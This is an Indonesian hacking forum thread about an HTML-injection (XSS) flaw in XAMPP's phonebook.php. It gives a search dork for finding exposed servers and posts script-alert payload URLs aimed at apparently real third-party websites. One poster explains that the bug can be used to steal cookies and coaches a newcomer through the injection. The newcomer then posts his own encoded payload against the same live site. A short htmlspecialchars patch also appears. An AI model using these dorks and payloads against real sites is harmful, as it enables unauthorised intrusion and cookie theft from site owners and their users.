XAMPP phonebook.php Multiple Remote HTML Injection Vuln

[shad.hckr]

XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Source: www.securityfocus.com
Vulnerable File : phonebook.php
Dork : inurl:"xampp/phonebook.php"
Live Action : http://gw.neocolumbus.com/xampp/phonebo ... ript>alert('sh4dhckr was here');</script>&firstname=1

[wiLMaR_kiDz]

bisa di kasi penjelasan dikit zam??..
kan gk smua user tw maksud ente di atas...
tul gk??.. hehee..
:circle: :circle: :putusasa:

[nesta]

iya om... kagak ngerti mohon penjelasannya. :maaf: :maaf:

[shad.hckr]

kalo bugs ini bisa dipake buat nyuri cookies.
kenapa bisa??
soalnya hasil dari inputan bakal di tampilin di webpage. tapi tanpa filter. jadi kalo kita masukin beberapa code langsung di eksekusi..

begitu penjelasan singkat dari saia wil.. tambahin dunk.. wkwkwkwk..

[nesta]

ngerti om tapi cara nmbah codenya gimana om...
http://dotmytees.com/xampp/phonebook.php?showcode=1
mohon bimbingannya... :maaf: :maaf: :maaf:

[shad.hckr]

nah itu kan dah ada contohnya..

[nesta]

ia om tapi cara nginjek codenya gimana om...

[shad.hckr]

@nesta

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php?lastname=<script>alert('sh4dhckr was here');</script>&firstname=1

penjelasan :
ini URL asli..

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php

hasil inject code HTML buat alert..

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php?lastname=<script>alert('sh4dhckr was here');</script>&firstname=1

kalo masih belum ngeh juga?? coba search di forum tentang XSS..

numpang share patchnya... tapi bener gak ya??? review dunk...

Code: Select all

<?php
$xss = htmlspecialchars($_POST['msg']);
if($xss == "")
{
echo "gak boleh kosong!";
} else {
echo "pesan kamu : <b>".$xss."</b>";
}
?>

[nesta]

wew ngerti dah om... makasih y????

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php?lastname=%3Cscript%3Ealert%28%27nesta%20was%20here%27%29;%3C/script%3E&firstname=1

:devil :devil :devil

[shad.hckr]

sama2 bro nesta...